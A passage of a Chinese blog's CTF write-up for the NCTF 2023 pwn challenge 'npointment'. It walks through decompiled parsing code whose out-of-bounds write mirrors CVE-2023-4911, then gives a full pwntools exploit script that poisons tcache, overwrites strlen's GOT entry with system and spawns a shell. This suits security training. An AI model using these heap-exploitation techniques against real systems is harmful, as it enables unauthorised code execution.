<p>但是这道题有一个比较奇怪的函数<code>sub_14B3</code>（一看就是漏洞点）。说实话，比赛时看出来这个函数是对content内容进行解析，但是没太看懂这个函数实现细节。比较幸运的是，手动测出来了漏洞点，但还是因为没太看懂函数操作，没利用起来。</p>
<p>根据<a target="_blank" rel="noopener" href="https://blog.unauth401.tech/2023nctf/#npointment">作者wp</a>，这个程序漏洞点是对<a target="_blank" rel="noopener" href="https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt">CVE-2023-4911</a>的复刻。遂看了这个CVE，才大致理解程序的漏洞点。值得一提的是，这个CVE在利用上挺有趣的，感兴趣的师傅可以看看。</p>
<p>回到这道题上，其他功能没有问题。主要针对<code>add</code> 函数进行分析。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> __int64 __fastcall <span class="hljs-title function_">add</span><span class="hljs-params">(<span class="hljs-type">const</span> <span class="hljs-type">char</span> *a1)</span><br>&#123;<br>  <span class="hljs-type">char</span> *s1a; <span class="hljs-comment">// [rsp+8h] [rbp-28h]</span><br>  <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+10h] [rbp-20h]</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> j; <span class="hljs-comment">// [rsp+10h] [rbp-20h]</span><br>  chunk *chunk; <span class="hljs-comment">// [rsp+18h] [rbp-18h]</span><br>  <span class="hljs-type">char</span> *v7; <span class="hljs-comment">// [rsp+20h] [rbp-10h]</span><br>  <span class="hljs-type">unsigned</span> __int64 v8; <span class="hljs-comment">// [rsp+28h] [rbp-8h]</span><br><br>  v8 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  chunk = (chunk *)get_chunk();<br>  <span class="hljs-keyword">if</span> ( chunk )<br>  &#123;<br>    <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> )<br>    &#123;<br>      <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; a1[i] != <span class="hljs-string">&#x27; &#x27;</span> &amp;&amp; a1[i] &amp;&amp; a1[i] != <span class="hljs-string">&#x27;=&#x27;</span>; ++i )<br>        ;<br>      <span class="hljs-keyword">if</span> ( !a1[i] )<br>        <span class="hljs-keyword">break</span>;<br>      <span class="hljs-keyword">if</span> ( a1[i] != <span class="hljs-string">&#x27; &#x27;</span> )<br>      &#123;<br>        a1[i] = <span class="hljs-number">0</span>;<br>        <span class="hljs-keyword">if</span> ( !<span class="hljs-built_in">strcmp</span>(a1, <span class="hljs-string">&quot;content&quot;</span>) )<br>        &#123;<br>          s1a = (<span class="hljs-type">char</span> *)&amp;a1[i + <span class="hljs-number">1</span>];             <span class="hljs-comment">// chunk-&gt;content + &#x27;content&#x27;</span><br>          <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; s1a[j]; ++j )            <span class="hljs-comment">// chunk-&gt;size</span><br>            ;<br>          v7 = strdup(s1a);<br>          <span class="hljs-keyword">if</span> ( v7 )<br>          &#123;<br>            parse_content(v7, (__int64)s1a);    <span class="hljs-comment">// ?</span><br>            chunk-&gt;size = j;<br>            chunk-&gt;content = v7;<br>          &#125;<br>          <span class="hljs-keyword">else</span><br>          &#123;<br>            <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Failed to alloc appointment.&quot;</span>);<br>            <span class="hljs-keyword">if</span> ( chunk-&gt;content )<br>            &#123;<br>              <span class="hljs-built_in">free</span>(chunk-&gt;content);<br>              chunk-&gt;content = <span class="hljs-number">0LL</span>;<br>            &#125;<br>            chunk-&gt;size = <span class="hljs-number">0</span>;<br>          &#125;<br>        &#125;<br><span class="hljs-comment">// ...</span><br></code></pre></td></tr></table></figure>

<p><code>add</code>函数调用<code>strdup</code>函数申请堆块，并调用<code>parse_content</code> 函数处理用户输入的<strong>content</strong>。这里需要关注函数参数，第一个参数是<code>strdup</code> 申请出来的，第二个参数单纯是复制栈上的<strong>content</strong>内容。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> __int64 __fastcall <span class="hljs-title function_">parse_content</span><span class="hljs-params">(<span class="hljs-type">char</span> *heap, __int64 content)</span><br>&#123;<br>  <span class="hljs-type">size_t</span> v2; <span class="hljs-comment">// rax</span><br>  <span class="hljs-type">int</span> v3; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">char</span> *v4; <span class="hljs-comment">// rax</span><br>  <span class="hljs-type">int</span> v5; <span class="hljs-comment">// edx</span><br>  <span class="hljs-type">int</span> v6; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">int</span> v7; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">int</span> v9; <span class="hljs-comment">// [rsp+18h] [rbp-38h]</span><br>  <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+1Ch] [rbp-34h]</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> j; <span class="hljs-comment">// [rsp+1Ch] [rbp-34h]</span><br>  <span class="hljs-type">int</span> k; <span class="hljs-comment">// [rsp+20h] [rbp-30h]</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> m; <span class="hljs-comment">// [rsp+24h] [rbp-2Ch]</span><br>  <span class="hljs-type">char</span> *_heap; <span class="hljs-comment">// [rsp+28h] [rbp-28h]</span><br>  <span class="hljs-type">char</span> *v15; <span class="hljs-comment">// [rsp+30h] [rbp-20h]</span><br>  <span class="hljs-type">char</span> *__heap; <span class="hljs-comment">// [rsp+38h] [rbp-18h]</span><br>  __int64 v17; <span class="hljs-comment">// [rsp+40h] [rbp-10h]</span><br>  <span class="hljs-type">unsigned</span> __int64 v18; <span class="hljs-comment">// [rsp+48h] [rbp-8h]</span><br><br>  v18 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  _heap = heap;<br>  v9 = <span class="hljs-number">0</span>;<br>  <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> )                                   <span class="hljs-comment">// date=date=a</span><br>  &#123;<br>    __heap = _heap;<br>    <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; _heap[i] != <span class="hljs-string">&#x27;=&#x27;</span> &amp;&amp; _heap[i] != <span class="hljs-string">&#x27;:&#x27;</span> &amp;&amp; _heap[i]; ++i )<br>      ;<br>    <span class="hljs-keyword">if</span> ( !_heap[i] )<br>      <span class="hljs-keyword">return</span> v18 - __readfsqword(<span class="hljs-number">0x28</span>u);<br>    <span class="hljs-keyword">if</span> ( _heap[i] == <span class="hljs-string">&#x27;:&#x27;</span> )<br>    &#123;<br>      _heap += (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)(i + <span class="hljs-number">1</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>      _heap += (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)(i + <span class="hljs-number">1</span>);<br>      v17 = _heap - heap + content;<br>      <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; _heap[j] != <span class="hljs-string">&#x27;:&#x27;</span> &amp;&amp; _heap[j]; ++j )<br>        ;<br>      <span class="hljs-keyword">for</span> ( k = <span class="hljs-number">0</span>; k &lt;= <span class="hljs-number">2</span>; ++k )<br>      &#123;<br>        v2 = <span class="hljs-built_in">strlen</span>((&amp;key_content)[k]);<br>        <span class="hljs-keyword">if</span> ( !<span class="hljs-built_in">strncmp</span>((&amp;key_content)[k], __heap, v2) )<br>        &#123;<br>          <span class="hljs-keyword">if</span> ( v9 )<br>          &#123;<br>            v3 = v9++;<br>            heap[v3] = <span class="hljs-string">&#x27;:&#x27;</span>;<br>          &#125;<br>          v15 = (&amp;key_content)[k];<br>          <span class="hljs-keyword">while</span> ( *v15 )<br>          &#123;<br>            v4 = v15++;<br>            v5 = v9++;<br>            heap[v5] = *v4;<br>          &#125;<br>          v6 = v9++;<br>          heap[v6] = <span class="hljs-string">&#x27;=&#x27;</span>;<br>          <span class="hljs-keyword">for</span> ( m = <span class="hljs-number">0</span>; m &lt; j; ++m )<br>          &#123;<br>            v7 = v9++;<br>            heap[v7] = *(_BYTE *)((<span class="hljs-type">int</span>)m + v17);<span class="hljs-comment">// 越界读写栈内容</span><br>          &#125;<br>          *(_BYTE *)(j + v17) = <span class="hljs-number">0</span>;<br>          <span class="hljs-keyword">break</span>;<br>        &#125;<br>      &#125;<br>      <span class="hljs-keyword">if</span> ( _heap[j] )<br>        _heap += j + <span class="hljs-number">1</span>;<br>    &#125;<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>当变量名为<strong>key_content</strong>中的字符串时，会进一步处理，也就是进行字符串复制操作，否则就单纯遍历content。                                                                                                                                                            </p>
<p>这里以输入<code>date=date=a</code> 为例。经过第一轮while循环，heap内容为<strong>date&#x3D;date&#x3D;a</strong>，但是_heap[j]为空，所以_heap不变，指向<strong>date&#x3D;<code>d</code>ate&#x3D;a</strong>。经过第二轮while循环，已经产生了越界，此时heap内容为<code>date=date=a:date=a</code>，但是_heap[j]依旧为空，所以_heap依然不变，但是_heap指向heap，而heap已经改变了，间接影响了_heap。此时_heap指向<strong>date&#x3D;date&#x3D;<code>a</code>:date&#x3D;a</strong>。经过第三轮while循环，由于a后面是:，所以heap不变，_heap指向<strong>date&#x3D;date&#x3D;a:<code>d</code>ate&#x3D;a</strong>。经历第四轮while循环，产生了越界读，此时heap内容为<code>date=date=a:data=a:date=\0</code>，_heap指向<strong>date&#x3D;date&#x3D;a:date&#x3D;<code>a</code>:date&#x3D;\0</strong>。第五轮while循环类似于第三轮，没什么好说的，就不说了，此时_heap指向<strong>date&#x3D;date&#x3D;a:date&#x3D;a:<code>d</code>ate&#x3D;\0</strong>。经过第六轮while循环，heap内容变为<code>date=date=a:date=a:date=\0:date=</code>，此时_heap指向**date&#x3D;date&#x3D;a:date&#x3D;a:date&#x3D;<code>\0</code>**。在下一轮while循环中退出循环。</p>
<p>可以看到，这个函数确实是比较恶心，但是仔细分析也是能够看出来具体操作的。</p>
<p>利用思路：</p>
<ol>
<li>利用越界读，覆盖下一个chunk的大小，构造堆重叠</li>
<li>释放大于tcache的chunk，泄露libc地址，并合理泄露heap地址</li>
<li>打tcache的next指针，获取任意地址写</li>
<li>由于使用<code>strdup</code>分配内存，而<code>strdup</code>实现过程中调用了<code>strlen</code>，覆盖<strong>stelen_got</strong>表为<code>system</code>即可。</li>
</ol>
<p>最终wp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> warnings<br><br>warnings.filterwarnings(<span class="hljs-string">&quot;ignore&quot;</span>, category=BytesWarning)<br><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>fn = <span class="hljs-string">&#x27;./npointment-release&#x27;</span><br>elf = ELF(fn)<br>libc = ELF(<span class="hljs-string">&#x27;./libc.so.6&#x27;</span>)<br><br>debug = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> debug:<br>    p = process(fn)<br><span class="hljs-keyword">else</span>:<br>    p = remote()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>(<span class="hljs-params">s=<span class="hljs-string">&#x27;&#x27;</span></span>):<br>    <span class="hljs-keyword">if</span> debug:<br>        gdb.attach(p, s)<br>        pause()<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">pass</span><br><br>lg = <span class="hljs-keyword">lambda</span> x, y: log.success(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;x&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(y)&#125;</span>&#x27;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">add</span>(<span class="hljs-params">content</span>):<br>    p.sendlineafter(<span class="hljs-string">&#x27;$ &#x27;</span>, <span class="hljs-string">b&#x27;add content=&#x27;</span> + content)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">delete</span>(<span class="hljs-params">index</span>):<br>    p.sendlineafter(<span class="hljs-string">&#x27;$ &#x27;</span>, <span class="hljs-string">b&#x27;delete index=&#x27;</span> + <span class="hljs-built_in">str</span>(index).encode())<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>():<br>    p.sendlineafter(<span class="hljs-string">&#x27;$ &#x27;</span>, <span class="hljs-string">b&#x27;show &#x27;</span>)<br>    <br><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)  <span class="hljs-comment"># 0</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 1</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)    <span class="hljs-comment"># 2</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">0x500</span>)    <span class="hljs-comment"># 3</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)    <span class="hljs-comment"># 4</span><br><br>delete(<span class="hljs-number">0</span>)<br><br>add(<span class="hljs-string">b&#x27;date=date=aaaaaaaaa\0&#x27;</span> + <span class="hljs-string">b&#x27;b&#x27;</span> * <span class="hljs-number">21</span> + p64(<span class="hljs-number">0x531</span>))    <span class="hljs-comment"># 0 0x15</span><br><br>delete(<span class="hljs-number">2</span>)<br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 2</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">0x600</span>)   <span class="hljs-comment"># 5</span><br><br>show()<br>libc_base = u64(p.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0x1ff130</span><br>lg(<span class="hljs-string">&#x27;libc_base&#x27;</span>, libc_base)<br><br>strlen = libc_base + <span class="hljs-number">0x1fe080</span><br>system = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 6</span><br>delete(<span class="hljs-number">6</span>)<br><br>show()<br><br>p.recvuntil(<span class="hljs-string">&#x27;Appointment #3&#x27;</span>)<br>p.recvuntil(<span class="hljs-string">&#x27;Content: &#x27;</span>)<br>key = u64(p.recv(<span class="hljs-number">5</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>lg(<span class="hljs-string">&#x27;key&#x27;</span>, key)<br>heapbase = key &lt;&lt; <span class="hljs-number">12</span><br>lg(<span class="hljs-string">&#x27;heapbase&#x27;</span>, heapbase)<br><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 6</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">0x4e0</span>)   <span class="hljs-comment"># 7</span><br><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 8</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 9</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 10</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 11</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 12</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">0x400</span>)   <span class="hljs-comment"># 13</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)    <span class="hljs-comment"># 14</span><br><br>delete(<span class="hljs-number">11</span>)<br>delete(<span class="hljs-number">12</span>)<br>delete(<span class="hljs-number">8</span>)<br><br>payload = <span class="hljs-string">b&#x27;date=date=aaaaaaaaa\0&#x27;</span><br>payload += <span class="hljs-string">b&#x27;b&#x27;</span> * <span class="hljs-number">21</span> + p64(<span class="hljs-number">0x471</span>)<br>add(payload)    <span class="hljs-comment"># 8</span><br><br>delete(<span class="hljs-number">10</span>)<br><br>add(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">0x40</span> + p64(strlen ^ key))    <span class="hljs-comment"># 10</span><br>add(<span class="hljs-string">b&#x27;a&#x27;</span>)   <span class="hljs-comment"># 11</span><br>add(p64(system))    <span class="hljs-comment"># 12</span><br><br>add(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>)<br><br><span class="hljs-comment"># dbg()</span><br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123114858110.png" srcset="/img/loading.gif" lazyload alt="image-20240123114858110"></p>
<p><strong>参考文章</strong></p>
<p><a target="_blank" rel="noopener" href="https://blog.unauth401.tech/2023nctf/#nception">https://blog.unauth401.tech/2023nctf/#nception</a></p>
<p><a target="_blank" rel="noopener" href="https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt">https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt</a></p>
<p><a target="_blank" rel="noopener" href="https://ycznkvrmzo.feishu.cn/docx/FcpPdb6MfohmlDxkJ9DcXcdincc">https://ycznkvrmzo.feishu.cn/docx/FcpPdb6MfohmlDxkJ9DcXcdincc</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.xmcve.com/2023/12/28/NCTF2023-Writeup/">https://blog.xmcve.com/2023/12/28/NCTF2023-Writeup/</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/PWN/" class="category-chain-item">PWN</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn/">#pwn</a>
      
        <a href="/tags/wp/">#wp</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2023-nctf-部分赛题复现</div>
      <div>http://example.com/2024/01/22/2023-nctf-部分赛题复现/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>l1s00t</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年1月22日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2024年1月23日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/10/30/2023-10%E6%9C%88ctf%E5%A4%8D%E7%8E%B0%E8%AE%B0%E5%BD%95/" title="2023-10月ctf复现记录">
                        <span class="hidden-mobile">2023-10月ctf复现记录</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
